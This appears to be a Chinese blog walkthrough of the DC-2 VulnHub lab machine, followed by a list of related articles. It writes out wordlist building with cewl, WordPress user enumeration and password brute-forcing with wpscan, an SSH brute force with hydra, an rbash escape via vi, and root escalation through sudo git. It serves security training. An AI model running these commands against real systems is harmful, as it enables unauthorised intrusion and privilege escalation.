dc2靶机攻略

最新推荐文章于 2024-11-26 17:40:37 发布
最新推荐文章于 2024-11-26 17:40:37 发布
阅读量56 收藏
点赞数
分类专栏: 靶机系列 文章标签: 安全 网络安全 web安全 安全威胁分析 系统安全 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133974306
版权

dc2

扫描

image-20231022142140243

开放80端口,访问主页进不去,80端口下有提示

此时则需要修改/etc/hosts文件

image-20231022143107546

使用目录扫描

dirsearch -u http://10.4.7.146

dirb http://10.4.7.146

image-20231022144006409

image-20231022144019078

渗透

flag1

修改完dns进入主页后,最后一个模块内容即为flag1

image-20231022143308252

此页面内容提示使用从cewl获取字典,并且此网站wordpress搭的,所以可以使用wpscan获取字典

目录扫描时获取到了登录页

http://10.4.7.146/wp-admin/

image-20231022144137007

cewl -w pojie1.txt http://dc-2

image-20231022144638643

wpscan --url http://dc-2 --enumerate u

image-20231022144908532

找到三个登录用户信息

写入文本文件当做字典

image-20231022145004944

使用wpscan爆破登录用户密码

wpscan --url http://dc-2 -U pojie_user.txt -P pojie1.txt

image-20231022145239309

得到登录用户信息

jerry:adipiscing
tom:parturient

先使用jerry登录上去看看

image-20231022145412614

flag2

在pages模块中发现flag2

image-20231022145543263

这是提示我们换条路试试,应该是ssh登录

此处可以用hydra爆破ssh确认一下

hydra -L pojie_user.txt -P pojie1.txt ssh://10.4.7.146:7744 -V -f -t 50

image-20231022152000227

发现可以tom可以登录ssh

页面中media部分可以尝试文件上传,但是我没传成功,可能是wordpress权限不够

使用tom登录ssh

ssh tom@10.4.7.146 -p 7744

登录成功后,先查看一下信息,发现在rbash状态,使用受限

image-20231022153128337

那就先列出可用的命令大概看一下

compgen -c

image-20231022153232015

image-20231022153301217

最后部分有个vi

flag3

ls列出发现flag3,使用vi命令查看内容

image-20231022153433153

flag提示使用su,首先需要逃逸rbash

先使用vi编辑器开一个shell

vi新建一个文件,写入内容

:set shell=/bin/bash
:shell

image-20231022154519182

随后保存退出

然后添加环境变量后,即可su到jerry

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

image-20231022154934283

ps:此处如果无法直接成功添加环境变量,可以这样用

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

flag4

jerry用户加目录下下存在flag4文件

image-20231022155212823

提权及flag5

flag提示git提权,当然可以先试试别的提权能不能用

image-20231022155431802

sudo -l发现可以以root身份执行git

sudo git -p help config

!/bin/bash

image-20231022160231326

执行过后即为root身份,最终flag在/root目录下

sudo -l发现可以以root身份执行git

sudo git -p help config

!/bin/bash

执行过后即为root身份,最终flag在/root目录下

image-20231022160347227

order libra
关注
专栏目录
DC2靶机练习
LSYZWF的博客
04-22 322
实验环境:DC-2靶机,kali linux攻击机,win10辅助机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、kali主机扫描内网存活主机 查询kali主机的ip地址:192.168.246.130 创建DC2专用文件夹 开始扫描 继续具体扫描目标主机 开放的端口 目标系统开放了80端口与7744端口 开放了80端口,用浏览器访问ip地址,发现网页打不开,但是网址重定向为http://dc-2 所以需要在物
DC2-靶机
Au
08-19 1790
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
DC-2靶机攻略
weixin_43179779的博客
10-16 1931
DC-2靶机攻略
DC2靶机渗透
q1234syr_的博客
08-04 200
今天我们来学习D2靶机渗透找出所有flag开始进行靶机下载地址:链接:在靶机下载后,将模式改为NAT模式,重启靶机
Vulnhub | DC2靶机 渗透测试
菜鸡一枚
02-24 348
Vulnhub-DC系列第二个靶机,cewl & wpscan 构建字典、hydra爆破ssh、rbash绕过、git提权
vulnhub之DC2靶机
LainWith的博客
08-16 1499
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
DC2靶机
2301_77132421的博客
04-03 201
发现它还开启了ssh,端口是7744,结合我们之前得到了账号和密码,直接就可以ssh远程登录。发现可以用sudo提权,让普通用户可以零时拥有root权限。使用cewl爬取命令,生成一个针对dc-2的字典。经过尝试,jerry登录失败,但是tom登录成功。进来后发现很多命令不可用,需要绕过-rbash。它开启了80端口,我们尝试访问下它的网页。用dirb扫描后台,看看有什么重要的东西。经过查找,发下在这个网址下有一个后台登录。经过查找,终于找到了最后一个fiag。进去后经过查找,找到了flag2。
靶机-DC2
-----------------------------------------------------------------------------------------
11-27 1001
修改 hosts 文件来访问网站。使用 cewl 制作字典。使用 wpscan 对 WordPress 站点进行扫描和爆破。rbash 绕过sudo 提权git 提权如果不能输入,说明你的shell窗口不够小。[外链图片转存中…(img-f5Hv34cb-1701085667765)]找到最后flag[外链图片转存中…(img-RbBeuBEM-1701085667766)]修改 hosts 文件来访问网站。使用 cewl 制作字典。
vulnhub:DC2靶机
qq_63283137的博客
09-12 125
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。您仍然需要获得最终flag(唯一真正重要的flag!继续 - git outta here!Cewl 是以爬虫模式在指定URL上收集单词的工具,并将其制作成密码字典,以提高密码破解工具的成功率。rbash是受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
【vulnhub靶场之DC2靶机渗透】
qq_55213436的博客
07-12 606
大家好,又到了快乐的学习时光了,最近也是沉迷于DC系列的靶场,每一次成功拿下靶场后都会学习和总结到很多的东西。今天的受害者是DC-2靶场,话不多说,开整。献上靶场下载地址: https://download.vulnhub.com/dc/DC-2.zip信息收集nmap 收集主机信息: 尝试访问80端口:错误但是页面出现了dc-2,说明页面出现了重定向,需要修改hosts文件,添加具体的域名和IP地址。 再次访问: 发现网站的指纹信息如下: 使用工具wpscan获取cm......
【VulnHub靶机渗透】六:DC-2
野原新之助
04-25 718
靶机设定线索引导用户得到相关信息,存在弱口令和sudo权限配置不当等安全问题。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
玩转靶机Vulnhub:DC2(详细)
weixin_51566481的博客
07-26 1196
dc2,suid提权,rbash逃逸
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3731
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
零基础学安全--shell脚本学习(1)脚本创建执行及变量使用
qq_66164763的博客
11-24 801
Shell又称命令解释器,它能识别用户输入的各种命令,并传递给操作系统。它的作用类似于Windows操作系统中的命令行,但是,Shell的功能远比命令行强大的多。在UNIX或者localhost中,Shell既是用户交互的界面,也是控制系定义:变量名=变量内容使用:$变量名(一般来说这里加不加引号效果是相同的,但是如果你在引用变量时加''就会直接把这个$变量名当作字符串输出,相当于一个转义字符)双引号和花括号括起来可以进行字符串的拼接。
零基础学安全--HTML
qq_66164763的博客
11-24 379
是用于创建网页和网页应用的标准标记语言。它使用一系列标签(tags)来描述网页的内容和结构。
Springboot组合SpringSecurity安全插件基于密码的验证Demo
最新发布
yrldjsbk的博客
11-26 97
下面的案例,都是基于数据库mysql,用户密码,验证登录的策略demo。WebSecurityConfigurerAdapter,这个有提示,说该抽象类已经被弃用。如图,这个接口需要带一个参数,username。我使用的是Apifox接口管理软件。4:创建一个测试控制器HelloController.测试一下效果。)类的名字你可以自己定义,但是必须实现这个插件的接口才行。2:增加配置类,配置基础的参数信息。引入maven仓库的坐标。3:需要创建一个实现了接口。
医疗数据质量安全,数据安全解决方案,医院关心的数据安全问题,信息安全方案(Word原件)
2301_79994950的博客
11-26 219
3.4.2网络可信接入 3.4.3应用身份识别 3.4.4抵御SQL注入 3.4.5虚拟补丁防护 3.4.6阻断漏洞攻击
文件防泄密怎么做才更安全
jinan886的博客
11-26 274
防止文件泄密是一项长期而艰巨的任务。但只要我们不断采用先进的技术手段,加强员工的信息安全意识培训,并不断完善管理制度,就一定能够有效地降低文件泄密的风险,确保企业的信息安全
华为鸿蒙内核成为HarmonyOS NEXT流畅安全新基座
鹿鸣天涯
11-26 204
元OS可上可下、可分可合的灵活架构:鸿蒙内核基于组件理论模型实现功能特性细粒度解耦,并可根据不同场景的功能、性能、安全等差异化需求进行贴身适配及灵活组合部署,分则提升安全可靠,合则优化性能功耗,结合软硬件协同的轻量级隔离机制,实现性能、安全、时延的多重收益。鸿蒙内核具备更弹性、更流畅、更安全三大特征,性能超越Linux内核10.7%。万物智联时代的终端设备呼唤面向全场景的、更流畅、更安全的操作系统内核,传统终端内核虽有丰富的生态,但在弹性、安全可靠、可演进性方面存在挑战,其深度耦合的架构也对创新造成掣肘。
cbm-dc2 超声波程序
10-14
CBM-DC2超声波程序是一种基于超声波技术的测量程序。CBM是嵌入式系统名称,DC2则表示第二代设备。该程序主要应用于测量距离、检测物体的位置、识别物体的形状等方面。 CBM-DC2超声波程序的工作原理是通过超声波发射...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值